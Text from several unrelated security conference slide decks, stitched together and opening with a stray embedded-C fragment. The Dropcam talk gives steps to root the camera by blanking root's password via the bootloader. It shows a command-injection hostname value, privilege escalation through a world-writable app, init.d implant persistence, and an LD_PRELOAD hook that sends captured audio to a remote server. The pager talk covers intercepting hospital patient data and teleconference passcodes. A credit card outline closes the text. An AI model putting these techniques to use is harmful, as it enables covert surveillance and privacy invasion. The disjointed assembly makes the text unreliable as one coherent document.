Now, inside the callback process, we can devote more time on processor hungry tasks, as signal filtering,
permanent data storage, etc.
//callback function started from the kernel
char adc_callback(void) {
unsigned int resp;
//getting the converted value
callDriver(DRV_ADC,ADC_LAST_VALUE,&resp);
//changing line and printing on LCD
callDriver(DRV_LCD,LCD_LINE,1);
callDriver(DRV_LCD,LCD_INTEGER,resp);
return SUCCESS; | pdf |
www.synack.com
@colbymoore
@patrickwardle
optical surgery; implanting a dropcam
colby moore / patrick wardle
Synack
Colby Moore (vrl/synack)
Patrick Wardle (nasa/nsa/vrl/synack)
Synack’s R&D team
who we are
> an outline
overview
root access
vulnerabilities
implant
an overview
what/why?
“Dropcam is a cloud-based Wi-Fi video monitoring service with
free live streaming, two-way talk and remote viewing that
makes it easy to stay connected with places, people and pets,
no matter where you are.” (dropcam.com)
cloud recording
night vision
two-way talk
intelligent alerts
> setup
or
> a target
got a target on your back?!
extremely popular
found in interesting locations
useful capabilities
rooting a dropcam
popping one of these #
> probing some portz
exposed 3.3v UART
breakout board (FTDI serial to USB)
serial connection (pin 3 & 4)
> and action!
password prompt
$ screen /dev/tty.usbserial-A603NJ6C 115200
[0.000000] Linux version 2.6.38.8 (dropcambuild@linux-ws) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) )
[0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f
[0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
!
...
!
!
!
.:^:.
.o0WMMMMMNOc. lk,
dWMMMMNXNMMMMWl .NMc
dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd.
KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO
OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX
.0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX
:XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK
;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;.
'ONx' .WM:
..
!
Ambarella login:
> accessing the bootloader
bootloader
$ screen /dev/tty.usbserial-A603NJ6C 115200
!
___ ___ _________ _
/ _ \ | \/ || ___ \ | |
/ /_\ \| . . || |_/ / ___ ___ | |_
| _ || |\/| || ___ \ / _ \ / _ \ | __|
| | | || | | || |_/ /| (_) || (_) || |_
\_| |_/\_| |_/\____/ \___/ \___/ \__|
----------------------------------------------------------
Amboot(R) Ambarella(R) Copyright (C) 2004-2007
...
amboot>
power on
hit ‘enter’
> booting in a root shell
set boot parameters to /bin/sh
amboot> help
The following commands are supported:
help bios diag dump
erase exec ping r8
r16 r32 reboot reset
setenv show usbdl w8
w16 w32 bapi
amboot> help setenv
Usage: setenv [param] [val]
sn - Serial number
auto_boot - Automatic boot
cmdline - Boot parameters
auto_dl - Automatically try to boot over network
tftpd - TFTP server address
...
!
amboot>setenv cmdline DCSEC console=ttyS0 ubi.mtd=bak root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh
!
amboot>reboot
bootloader’s help
bootloader’s setenv command
> nop’ing out r00t’s password
reset boot params
# ls -l /etc/shadow
/etc/shadow -> /mnt/dropcam/shadow
!
# more /etc/fstab
# /etc/fstab: static file system information.
#
# <file system> <mount pt> <type>
# /dev/root / ext2
…
# NFS configuration for ttyS0
/dev/mtdblock9 /mnt/dropcam jffs2
!
# mount -tjffs2 /dev/mtdblock9 /mnt/dropcam
# vi /etc/shadow
root:$1$Sf9tWhv6$HCsGEUpFvigVcL7aV4V2t.:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
!
# more /etc/shadow
root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
!
reboot
root :)
vulnerabilities
….
> the environment
#uname -a
Linux Ambarella 2.6.38.8 #80 PREEMPT Aug 2013 armv6l GNU/Linux
!
# ps aux | grep connect
821 root 0:10 /usr/bin/connect
823 root 0:13 /usr/bin/connect
824 root 0:00 /usr/bin/connect
linux (arm 32-bit)
…and dropcam
specific binaries
> decently secure
no open ports
all communications
secured
unique provisioning
> heartbleed (client side)
# openssl version
OpenSSL 1.0.1e 11 Feb 2013
openssl version
yah,%this%is%vulnerable
> heartbleed (client side)
> busybox (cve-2011-2716)
busybox: “is a multi-call binary that
combines many common Unix utilities
into a single executable”
malicious%DHCP%server
//unpatched%version
case%OPTION_STRING:
%
memcpy(dest,%option,%len);
%
dest[len]%=%'\0';
%%%return%ret;%
;process%OPTION_STRING/OPTION_STRING_HOST%
MOV%%%%R0,%R4%%%%%%%%%%%
MOV%%%%R1,%R5%%%%%%%%%%%
MOV%%%%R2,%R7%%%%%%%%%%%
BL%%%%%memcpy%% % ;memcpy(dest,%option,%len)%%
MOV%%%%R3,%#0%
STRB%%%R3,%[R4,R7]%;dest[len]%=%'\0';
“host.com;evil%cmd”
cve-2011-2716: “scripts (may) assume that
hostname is trusted, which may lead to code
execution when hostname is specially crafted”
dropcam disassembly
> ‘direct usb’
power on
no%need%to%open%device!
> OS X privilege escalation
$ ls -lart /Volumes/Dropcam\ Pro/Setup\ Dropcam\ \(Macintosh\).app/Contents/MacOS/
!
-rwxrwxrwx 1 patrick staff 103936 Aug 12 2013 Setup Dropcam (Macintosh)
drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 ..
drwxrwxrwx 1 patrick staff 2048 Aug 12 2013 .
app%binary%is%world%writable!
non-priv’d attacker on host
infected dropcam app
r00t == yes
cuckoo’s egg
a dropcam implant
> the implant should…
see
hear
infect
command shell
locate
infil/exfil
survey
> conceptually
corporate network
“He sees you when you're sleeping
He knows when you're awake
He knows if you've been bad or good”
(like the NSA? j/k)
> finding the “brain”
how does the dropcam, hear, see, and
think?
where is the brain?!
> the connect binary
the /usr/bin/connect binary is a
monolithic program that largely
contains the dropcam specific logic.
> but it’s non-standardly packed….
$ hexdump -C dropCam/fileSystem/usr/bin/connect
!
00000000 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 28 00 01 00 00 00 a0 f5 06 00 34 00 00 00 |..(.........4...|
00000020 74 81 06 00 02 02 00 05 34 00 20 00 02 00 28 00 |t.......4. ...(.|
00000030 03 00 02 00 01 00 00 00 00 00 00 00 00 80 00 00 |................|
00000040 00 80 00 00 8c 7e 06 00 8c 7e 06 00 05 00 00 00 |.....~...~......|
00000050 00 80 00 00 01 00 00 00 90 5a 00 00 90 5a 14 00 |.........Z...Z..|
00000060 90 5a 14 00 00 00 00 00 00 00 00 00 06 00 00 00 |.Z..............|
00000070 00 80 00 00 7f d2 62 0c 55 50 58 21 04 09 0d 17 |......b.UPX!....|
$ upx -d dropCam/fileSystem/usr/bin/connect
Ultimate Packer for eXecutables
!
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
!
File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: connect: IOException: bad write
!
Unpacked 1 file: 0 ok, 1 error.
upx’d
unpack error :/
> packed connect
packer stub was identified as NRV2E
and identically matched source (armv4_n2e_d8.S)
!
-> the stub was not modified/customized
//elf%unpack%function
void%PackLinuxElf32::unpack(OutputFile%*fo)
{
%
...
%%%bool%const%is_shlib%=%(ehdrc>e_shoff!=0);%
%
//this%code%path%taken
%
if(is_shlib)
%
{
%
%
%
//exception%is%thrown%here
upx%src;%p_lx_elf.cpp
//elf%unpack%function
#define%EI_NIDENT%16%
typedef%struct%{
%
Elf_Char% e_ident[EI_NIDENT];
%
Elf32_Half%e_type;
%
Elf32_Half%e_machine;
%
Elf32_Word%e_version;
%
Elf32_Addr%e_entry;
%
Elf32_Off%e_phoff;
%
Elf32_Off%e_shoff;
%%%%…
}%Elf32_Ehdr;
> generically unpacking connect
connect is not a shared library
…why is is_shlib true (due to e_shoff != 0)?
//unset%ehdrc>e_shoff
with%open(fileName,%'rb')%as%packedFile
%
fileBytez%=%list(packedFile.read())
%
#zero%out%ehdrc>e_shoff
%
fileBytez[SH_OFFSET:SH_OFFSET+SH_SIZE]%=%[0]*SH_SIZE
$ python dropWham.py connect -unpack
[+] unsetting ehdr->e_shoff
[+] invoking UPX to unpack
Ultimate Packer for eXecutables
File size Ratio Format Name
-------------------- ------ ----------- -----------
890244 <- 426577 47.92% linux/armel connect
Unpacked 1 file.
!
$ strings connect
Dropcam Connect - Version: %d, Build: %d (%s, %s, %s)
jenkins-connect-release-node=linux-144, origin/release/grains_of_paradise
CONNECT_BUILD_INFO
CONNECT_PLATFORM
CONNECT_VERSION
nexus.dropcam.com
...
can use for evilz?!
> the persistent core
easy
portable
modules
# du -sh
34.6M
!
# less /etc/init.d/S40myservices
...
tar -xvf python2.7-stripped.tgz -C /tmp/
/tmp/bin/python2.7 /implant/cuckoo.py &
!
cuckoo’s nest…something
not enough space for python
persist as init.d script-
decompress custom python
…and action!
> networking C&C
# netstat -t
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 1144 192.168.0.2:40978 ec2-54-196-21-142.compute-1.amazonaws.com:https ESTABLISHED
tcp 0 1337 192.168.0.2:41988 ec2-54-196-21-130.compute-1.amazonaws.com:https ESTABLISHED
which is legit? ;)
command and control channel
streaming channel
dropcam/cuckoo’s egg connections
> geolocation
?
{iwlist-wlan0-scan}
googleapis.com/geolocation/v1/geolocate?
> host infection
> host infection
this is the (implanted) device!
renamed (original) binary
OS X kindly hides app details
> host infection (OS X)
XProtect
Gatekeeper
OSX Sandbox
Code Signing
he wins!
<
> audio and video
/usr/bin/connect
kernel mode
conceptually
more specifically
> injection
the connect binary exclusively
opens both the audio card
# arecord
arecord: audio open error
!
Device or resource busy
connect’s-process space
kernel mode
injected module
# LD_PRELOAD=./injectMe.so
/usr/bin/connect
module injection
no sharing
> hooking
//blah
int%main()
{%
%
//do%something
%
result%=%someFunction();%
%
printf(“result:%%#x\n”,%result);%
}
//blah
int%someFunction()
{%
%
//do%something%
%
return%someInt;
}
//blah
int%someFunction()
{%
%
//do%something%EVIL%
%
return%someInt;
}
}
same name &
declaration
> grabbing audio
dropcam uses the Advanced Linux Sound
Architecture (ALSA) for audio
//blah
LDR%%%%%R2,%[R11,#size]
LDR%%%%%R0,%[R5,#0xFC]
SUB%%%%%R1,%R11,%#cptrptrBuffer
BL%%%%%%snd_pcm_readn% %
;read%audio!
CMP%%%%%R0,%R2
BEQ%%%%%readOK
...
LDR%%%%%R1,%"read%from%audio%interface%failed"
MOV%%%%%R0,%R4%%%%%%%%%%% %
;=stderr
BL%%%%%%fprintf
finally some disasm ;)
get some audio
snd_pcm_sframes_t%snd_pcm_readn(
%
%
%
snd_pcm_t*%pcm,%
%
%
%
void%**bufs,%
%
%
%
snd_pcm_uframes_t%size)
“Read non interleaved frames to a PCM”
> programmatically hooking audio
//replaces%snd_pcm_readn
//%c>captures%dropcam’s%audiosnd_pcm_sframes_t%snd_pcm_readn(snd_pcm_t%*pcm,%void%**bufs,%snd_pcm_uframes_t%size)
{
%%
%%//function%pointer%for%real%snd_pcm_readn()
%%static%snd_pcm_sframes_t%(*orig_snd_pcm_readn)(snd_pcm_t*,%void**,%snd_pcm_uframes_t)%=%NULL;
%%//frames%read
%%snd_pcm_sframes_t%%framesRead%=%0;
%%//get%original%function%pointer%for%snd_pcm_readn()
%%if(NULL%==%orig_snd_pcm_readn)
%
orig_snd_pcm_readn%=%(snd_pcm_sframes_t(*)(snd_pcm_t*,%void**,%snd_pcm_uframes_t))%=%dlsym(RTLD_NEXT,%"snd_pcm_readn");%
%%//invoke%original%snd_pcm_readn()
%%framesRead%=%orig_snd_pcm_readn(pcm,%bufs,%size);
%%//exfil%captured%audio
%%if(framesRead%>%0)
%%% sendToServer(AUDIO_SERVER,%AUDIO_SERVER_PORT,%bufs,%size);
%%return%framesRead;
}
injected into connect process
> grabbing video
dropcam talks to a propriety Ambarrella kernel module to
access the h.264 encoded video stream :/
//blah
LDR%%%%%R0,%"/dev/iav"
MOV%%%%%R1,%#2%%%%%%%%%%;%oflag
MOV%%%%%R2,%#0
BL%%%%%%open
send ioctl to video driver
open video device
//blah
MOV%%%%%R0,%R5%%%%%%%%%%
LDR%%%%%R1,%=0x40046540%% ;%ioctl
MOV%%%%%R2,%#0xD
BL%%%%%%ioctl
CMP%%%%%R0,%#0
LDRLT%%%R0,%"IAV_IOC_START_ENCODE_EX"
BLT%%%%%printError
undocumented
struct :/
//blah
MOV%%%%%R3,%#1
MOV%%%%%R0,%R5%%%%%%%%%%;%fd
LDR%%%%%R1,%=0x80046537%;%request
ADD%%%%%R2,%SP,%#0x120+var_D8
STRB%%%%R3,%[R8]
BL%%%%%%ioctl
CMP%%%%%R0,%#0
LDRLT%%%R0,%=aIav_ioc_read_b%;%"IAV_IOC_READ_BITSTREAM_EX"
BLT%%%%%printError
> grabbing video
open the /dev/iav device
map BSB memory via
IAV_IOC_MAP_BSB ioctl
map DSP memory via
IAV_IOC_MAP_DSP ioctl
get the streams state via
IAV_IOC_GET_ENCODE_STREAM_INFO_EX ioctl
then check that its IAV_STREAM_STATE_ENCODING
finally, read the stream
via the IAV_IOC_READ_BITSTREAM_EX ioctl
get the h.264 parameters
via IAV_IOC_GET_H264_CONFIG_EX ioctl
> manipulating video (conceptually)
connect’s-process space
injected module
> manipulating video (example)
size and pointer to frame
allows the malicious code to
swap out frames on the fly….or
just replay one(s) to loop the
video stream!
IAV_IOC_READ_BITSTREAM_EX-ioctl
> cuckoo’s egg C&C server
> cuckoo’s egg C&C server
status/result
command data
> questions/answers
@colbymoore
@patrickwardle
[email protected]
[email protected]
> creditz
images: dropcam.com
icons: iconmonstr.com
flaticon.com | pdf |
1
NYCMIKE
NYCMIKE
The World of Pager Sniffing
The World of Pager Sniffing
and Interception:
and Interception:
More Activity than one may
More Activity than one may
suspect.
suspect.
+
=
Music: The Cools Kids – Gold and a Pager
The idea is the let the music play while folks enter the room then move on to
the next slide.
(Point out the obvious) Pager interception was once well documented and
“wildly” done within certain groups. Therefore I’m no trailblazer or am I? Old
tech is not bad tech, its dated,
Its documented, but still useable and interesting. The idea is to re-
introduced the activity with some ideas that may of not been available in the
early to mid 90’s.
I want to stress again that OLD TECH IS NOT BAD TECH…if anything its
tried and tested.
*note* I probably should of removed or just covered up the text in that screen
capture… What do you see when you read it.
2
NYCMIKE
NYCMIKE
-- ““Do not go where the path may lead, go
Do not go where the path may lead, go
instead where there is no path and leave
instead where there is no path and leave
a trail.
a trail.””
- Ralph Waldo Emerson
- Ralph Waldo Emerson
-- ““Everything that was or ever is began with
Everything that was or ever is began with
a dream.
a dream.””
- Lava Girl
- Lava Girl
Quote (1) : Pager interception has been done, therefore the path has been
made so how does this relate? Things evolve over time this is no exception
so I encourage all to find the
new path. The challenge to reinvent, rethink, and retool is open to
all… amateur SIGINT (radio monitoring) is a blast (expensive) join the ranks
and help the hobby.
Quote (2) : Don’t be afraid to think outside of the box. Try your concepts
sometime things just work.
3
NYCMIKE
NYCMIKE
Who is this guy?
Who is this guy?
Nicks:
Nicks:
Steve from Idaho, Snuffalupugus, NYCMIKE and Dr. Love and
Steve from Idaho, Snuffalupugus, NYCMIKE and Dr. Love and
a few others.
a few others.
Work History:
Work History:
Busboy at a local banquet hall, Gas station clerk (slurpe tech),
Busboy at a local banquet hall, Gas station clerk (slurpe tech),
Public service.
Public service.
Hobbies:
Hobbies:
Electronics, SIGINT (explain), making stuff and breaking stuff.
Electronics, SIGINT (explain), making stuff and breaking stuff.
I’m just a guy in love with radio. If you want to drop me some knowledge in
this field please do so at one of the following places: irc (irc.2600.net
#telephreak/#radio/#make/#ca2600) or the Telephreak voice bridge
(www.telephreak.org). Chances are I will not be there under the name
NYCMIKE so just ask the question in #telephreak.
4
NYCMIKE
NYCMIKE
Quick look
Quick look
PAGERS
PAGERS…
… Are you serious, this isn
Are you serious, this isn’’t 1993,
t 1993,
who uses these pager things anymore?
who uses these pager things anymore?
IBM DOC FWD e-mails
IBM DOC FWD e-mails
SANDIA Los Alamos Labs
SANDIA Los Alamos Labs
DHS Sports updating
DHS Sports updating
DOT Hospitals (patient details)
DOT Hospitals (patient details)
BOP Teleconferences
BOP Teleconferences
AND MANY MORE
AND MANY MORE…
…
Okay off the bat lets agree that with the exception of niche markets pager
technology has been replaced. Cost used to be the factor that favored the
pager, that is no longer the case. An advantage the pager will have as long
as its network is active, is signal penetration and strength. The signal is
offset so that gaps or “shadows” are filled. Once you get the setup
configured and going you’ll have hours of entertainment (For me this is the
case).
There is traffic and it can be juicy; e.g. several companies hold telephone
conference calls (which means they page the conf number and pass code,
which COULD lead to a non invited party to lurk on the line), SANDIA sends
msg similar to “Call Ralph at XYZ corp and here is his number”, DHS could
be sending out SA updates, DOT….., BOP offers the happenings of
correctional institutes (lock down or hey we found dope in a glassine bag
buried in inmate JOHN DOE’s anal cavity), Sporting events (numbers and
lines), the hospital data is disturbing due to the amount of info given out
(patients name and complaints, not to mention lab results), The phone
conferences are just asking to be recorded…
The thing to note is that this mode of communications is still in use and still
very much visible. Keep in mind that at face value some data may not seem
useful and it may not be to some, BUT the fact is this sort of information is
what can be useable in SE operations.
5
NYCMIKE
NYCMIKE
Learning Objectives
Learning Objectives
Refreshing on Pager Technology
Refreshing on Pager Technology
- Cap Codes, Protocols (Pocsag/ Flex/
- Cap Codes, Protocols (Pocsag/ Flex/
Golay/ Ermes),
Golay/ Ermes),
Laws governing the interception and
Laws governing the interception and
decoding of pager traffic.
decoding of pager traffic.
Data Slicers
Data Slicers
Discriminator taps
Discriminator taps
Q: How do pagers work?
A: RF, A intends to send a msg to B, A’s msg enters the network…. sat,
transmitters on cell phone towers
Common protocols are pocsag and flex in the US…
These are the two I hear the most, therefore this is what I’ll cover.
Q: CapCodes?
A: unique ID’s, unit will only activate when it hears its ID/CAPCODE over the
air
Q:Data Slicers?
A: Converts analog and digital (FSK)
Q: Discriminator tap?
A: Base band audio
Q: illegal?
A: Not always
Note I’ve added golay/ermes BECAUSE when listening to online scanners
its online thus not limited to US
POCSAG: Post Office Code Standardization Advisory Group
ERMES (European Radio Messaging System)
6
NYCMIKE
NYCMIKE
Learning Objectives
Learning Objectives
Basic SIGINT
Basic SIGINT
A brief look at the disciplines and
A brief look at the disciplines and
how they are being used.
how they are being used.
Targeting, amount of RCVR
Targeting, amount of RCVR’’s, Sig
s, Sig
detection, traffic analysis.
detection, traffic analysis.
Ways to search through the data and
Ways to search through the data and
finding that needle in the haystack
finding that needle in the haystack
Basic SIGINT? (I call it SIGINT cause it sounds cool but by definition these
techniques are used.)
SIGnals INTelligence
Disciplines:
Targeting: Pager networks need for multiple.
Coordinated rcvrs: ( This ideology is explored in the concepts segment
of this talk). By deploying “deployable” units or “linking” up with other
operations. Not all subscribers
have nationwide service, therefore having multi rcvrs would broaden
collections.
Signal detection: Know the freq range then use the SA/Band Scope to
search for poss. Signal
Traffic Analysis: Again knowing capcodes is important, by doing this you
begin to “map” the network, which enhances the
entertainment value.
Q: The responsibility of knowledge?
A: You may see things that could be damaging but then again to share
would be illegal… BE SMART with what you find.
Q: What is good, what is crap, what may be useful down the line?
A: Research, I think this is the what makes the whole hobby worth wild for
me…
7
NYCMIKE
NYCMIKE
Pager Refresher
Pager Refresher
- The Rise and Fall
- The Rise and Fall
- Uses
- Uses
- US pager protocols
- US pager protocols
Rise/Fall | Uses | US Protocols
===========================================================
=========================
Cost of Cell phones and Professional POCSAG, FLEX
Capabilities have pushed Personal
Use down
This will be extremely general assuming that most of this is common
knowledge. If the audience shows interest ( I will ask), I’ll mention the cost
verse function factor. The main point is to stress that old tech doesn’t mean
it’s bad tech.
8
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Antennas:
Antennas:
RCV 25-1300MHz TRANSMIT RCV 108-1300MHz
VHF and UHF signals that have high signal strength, with that said the stock
antenna should work fine.
Pre amp, if one where to be used it needs to be located outside at the
antenna. For pager signals it is not needed, but it wouldn’t be a bad idea if
you’re trying to go after other signal types.
The antennas shown should be higher but due to the community I live in
putting them higher is not an option.
9
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Cables:
Cables:
1/8 not 1/4
RG-58/59/8
RS 232 DB 9
Get the right RCA
Explain the difference in coax (50 ohm/75 ohm)
DB 9 adapters will not work with PDW
I get my cables from www.allelectronics.com
10
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Decoding Software:
Decoding Software:
Windows Linux DOS
http://www.pervisell.com/ham/shot_en.htm
multimon
Multimon decodes using sound card (Also AX.25 – packet radio BBS, DTMF)
- linux
PDW decodes using sound card (Also Flex, ACARS, MOBITEX & ERMES) –
widows
POC32…
Radioraft…
I strictly use PDW… but that doesn’t mean you should. Sample different
apps and find out what works for you.
11
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Radios:
Radios:
PC Controlled NON PC Controlled
PC controlled allows the radio to become remote…
NON PC allows the operation to be lower cost…
12
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Radios:
Radios:
Choosing the right fit.
Choosing the right fit.
- Cost
- Cost
- Mobility
- Mobility
- Ease of use
- Ease of use
Cost: How much you plan to spend is up to you , but why go overboard when
you can buy a mobile within the
Needed freq range for so much cheaper (pro-84) or a desktop (bd 855 xlt)
Mobility: This may be a concern for me it is not.
Ease of use: The Plug and Play (PNP) concept doesn’t always work. In radio
there are all sorts of models and
not every operator is as skilled as the as next.
13
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
www.discriminator.nl
Discriminator Taps:
TK-10421
(Toko America)
Pin 11
This field has been well documented… Thanks to the late Bill Cheek
Either pin 9 or 11 in most cases where you need to tap off of.
14
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
What is it?
What is it?
Why is it needed?
Why is it needed?
Finding the Discriminator IC?
Finding the Discriminator IC?
Discriminator Taps:
What is it:
A physical connection from a pin off the discriminator IC/circuit (the pin
varies depending on the chip), this connection
allows access to the raw audio so that the rcvd signal can be decoded.
Why is it needed:
In order to decode digital mods the raw signal is needed, raw meaning
before it has reached the “audio stage” this is known as “baseband audio”.
Finding the chip:
A large amount of documentation regarding current and pass scanners
exist… (go into more detail)
15
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Data Slicers
Data Slicers
Level 2 Level 4
Not very expensive to either make or buy… both slicers can be bought for
lvl2 ($16) and lvl4 ($24) w/ power adapter, both prices may have changed.
(check ebay)
What exactly the data slicer does… kinda like a modem and it decodes
FSK…
Note:
Lvl 2 is also known as a hamcomm
16
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Level 2 Level 4
http://wiki.radioreference.com/index.php/Data_Slicers
17
NYCMIKE
NYCMIKE
Setting Up the
Setting Up the ““Station
Station””
Ethics
Ethics
More or less don’t be a dumb ass.
18
NYCMIKE
NYCMIKE
Operations
Operations
FCC ULS: Know what you are hearing.
FCC ULS: Know what you are hearing.
POCSAG (
POCSAG (512
512,,1200
1200,,2400
2400))
- Post Office Code Standardization Advisory Group
- Post Office Code Standardization Advisory Group
FLEX (
FLEX (1600
1600,3200 lvl 2/3200, 6400 lvl 4)
,3200 lvl 2/3200, 6400 lvl 4)
Scanning the bands using a Band Scope
Scanning the bands using a Band Scope
Audio from http://www.kb9ukd.com/digital/
The ULS DB is grand but its only for the initial search.
Get to know the signals by ear its best when your looking for a solid signal.
The Band Scope will show you activity near the freq you are on.
19
NYCMIKE
NYCMIKE
Operations
Operations
Walk thru of the ULS database
Walk thru of the ULS database
Main page
20
NYCMIKE
NYCMIKE
Operations
Operations
21
NYCMIKE
NYCMIKE
Operations
Operations
CD - Paging and Radiotelephone
CD - Paging and Radiotelephone
CP - Part 22 VHF/UHF Paging
CP - Part 22 VHF/UHF Paging
(excluding 931MHz)
(excluding 931MHz)
22
NYCMIKE
NYCMIKE
Operations
Operations
CD - Paging and Radiotelephone
CD - Paging and Radiotelephone
23
NYCMIKE
NYCMIKE
Radio Sexy
Radio Sexy
Operations
Operations
Getting to know an interface (PCR-1000).
24
NYCMIKE
NYCMIKE
Operations
Operations
6K VS 50K: 6k just isn’t wide enough
for most text
Once I have the freq that I will be monitoring I’ll switch the bandwidth from
15k to 50k on NFM.
25
NYCMIKE
NYCMIKE
Example of an off freq capture or wrong
Example of an off freq capture or wrong
bandwidth setting
bandwidth setting…
…
Operations
Operations
If the bandwidth isn’t correct or if the signal isn’t clear enough you’ll end up
with garbled data.
26
NYCMIKE
NYCMIKE
Operations
Operations
Laws:
Laws:
Communications Act of 1934
Communications Act of 1934
ECPA of 1986
ECPA of 1986
27
NYCMIKE
NYCMIKE
Analyze
Analyze
1687XX6
AMKC
GRVC
MESSAGE
SEARCH
Collection Collection and did I mention
Collection Collection and did I mention
Collection?.
Collection?.
CAPCODES
SEARCHING
The idea is gather data to get actionable information or information of
interest. As with any sort of collection
there needs to be strong set of ethics lad down first. This data is in the
clear but none the less it shouldn’t be
abused that’s not the point or is it?
28
NYCMIKE
NYCMIKE
Analyze
Analyze
““Get to know the Capcodes
Get to know the Capcodes””
““Get to know the abbreviations
Get to know the abbreviations””
Example : Looking more into this
Example : Looking more into this ““AMKC
AMKC””
After establishing a history of traffic “get to know the capcodes”
Create an archive then go through the logs and disseminate the data e.g..
AMKC/GRVC, then run them through an internet resource.
29
NYCMIKE
NYCMIKE
AMKC equates to Anne M. Kross
AMKC equates to Anne M. Kross
Center
Center…
…
Analyze
Analyze
BAM… we found it, now you may want to go one step further and look for a
inmate support forum (Spouses, girl friends, boy friends of inmates at
Rikers Island have a forum).
30
NYCMIKE
NYCMIKE
Teleconferences:
Teleconferences:
In the logs its just a phone number.
In the logs its just a phone number.
Analyze
Analyze
The conf bridges seem to be semi-trusted environments. Persons in the
room have no real qualms sharing information, why would they, you need a
temp login… sure why not you’re suppose to be here remember.
31
NYCMIKE
NYCMIKE
Concerns
Concerns
Quality & Quantity
Quality & Quantity
Possible Damaging Scenarios
Possible Damaging Scenarios
Who can listen/watch traffic:
Who can listen/watch traffic:
EVERYONE
EVERYONE
Is that corporate weekly management
Is that corporate weekly management
meeting on the teleconference safe?
meeting on the teleconference safe?
We are only as strong as our weakest link.
32
NYCMIKE
NYCMIKE
Concepts
Concepts
Mobile Units:
Mobile Units:
Mobile leech aka Ghetto beeper buster
A mail able unit ?
$ 7 thrift store briefcase OR FREE flat rate box
IED??? That is obviously a real concern, but the step doesn’t have to
include the table top scanner… I just think it looks sexier.
PCR-1000 with serial interface to a palm pilot
33
NYCMIKE
NYCMIKE
Concepts
Concepts
Reprogramming inactive pagers with
Reprogramming inactive pagers with
active Cap Codes.
active Cap Codes.
Swapping out the crystals
NYCMIKE
NYCMIKE
Utilizing online radio sharing communities
Utilizing online radio sharing communities
How does it work?
How does it work?
Concepts
Concepts
34
35
NYCMIKE
NYCMIKE
Concepts
Concepts
Decoding digital signals off of online
Decoding digital signals off of online
communities like:
communities like: www.globaltuners.com
www.globaltuners.com
Used to be dxtuners.com
36
NYCMIKE
NYCMIKE
Concepts
Concepts
Most if not all use the line out off the radio in this community, therefore
without the base band I’m going no where BUT it should be do able if setup
correctly ( on the pcr 1000 it has a “packet radio” jack which happens to be a
discriminator tap. The site also offers different sound qualities:
Low quality: 16kbit CBR mono 11.025kHz
Medium quality: 32kbit CBR mono 22.050kHz
High quality: 32-128kbit VBR mono 44.100kHz
NYCMIKE
NYCMIKE
Wrapping Up
Wrapping Up
Garbage in will result in garbage out BUT
Garbage in will result in garbage out BUT
if the radio on the far end it setup correctly
if the radio on the far end it setup correctly
the idea can and will work
the idea can and will work…
…
37
38
NYCMIKE
NYCMIKE
Q&A, which is different than T&A
Q&A, which is different than T&A
IF TIME ALLOWS
IF TIME ALLOWS
OR
OR
FIND ME AFTER
FIND ME AFTER
Thank you for looking at the slides. | pdf |
Credit Cards: Everything You have
Ever Wanted to Know
Robert “hackajar” Imhoff-Dousharm
A brief History
● 1950 DinersClub
● 1958 American Express
● 1958 BankAmericard (Visa)
● 1966 MasterCard International (ICA)
● 1986 Discover Card
Technology
● Knuckle Buster's
● Dial-Up Authorization Terminal
● High Speed Leased Lines
● Gateway Processor's
● Co-op Leased Lines
● Online API Gateways
Marketing & Technology
● Smart Cards
● Virtual One Time Use Cards
● Gift Cards
● Secure Cards
● Easy Pay RFID Cards
Physical Fraud Features
● Embossed Card Number
● Card Vendors Logo
● Card Vendors Hologram
● Card Vendors Embossed Cursive Letter
● First 4-digits non-embossed
● Expiration Date
● Magnetic Strip
● Signature Panel
● CVV2 Code
Credit Card Magnet Data
● 2 Tracks used for credit cards
● 3rd Track used for meta data, non credit cards
● Review of Tracks 1 & 2
Transaction Flow - Authorization
● Initial Authorization
● FEP Hand Off
● Back End / Merchant Link
● Issuing Bank Authorization
● FEP Record Update
● Terminal Signature Printout
Transaction Flow - Settlement
● Close Out Terminal
● Send Closeout request to FEP
● Send Totals, individual transactions, Totals
● FEP Record Update
● FEP Batch Close to Issuing Banks
● Money is “Settled” to MSP
● MSP Funds Merchant
Data Storage
● Grab ass with your personal data
● Known sources of data storage
● Possible sources data may be stored
● Extent of Information Stored
● High Risk Merchants (for information leakage)
● Internet Merchants
Questions & Answers
● All questions accepted on topics covered from
last three DefCon talks
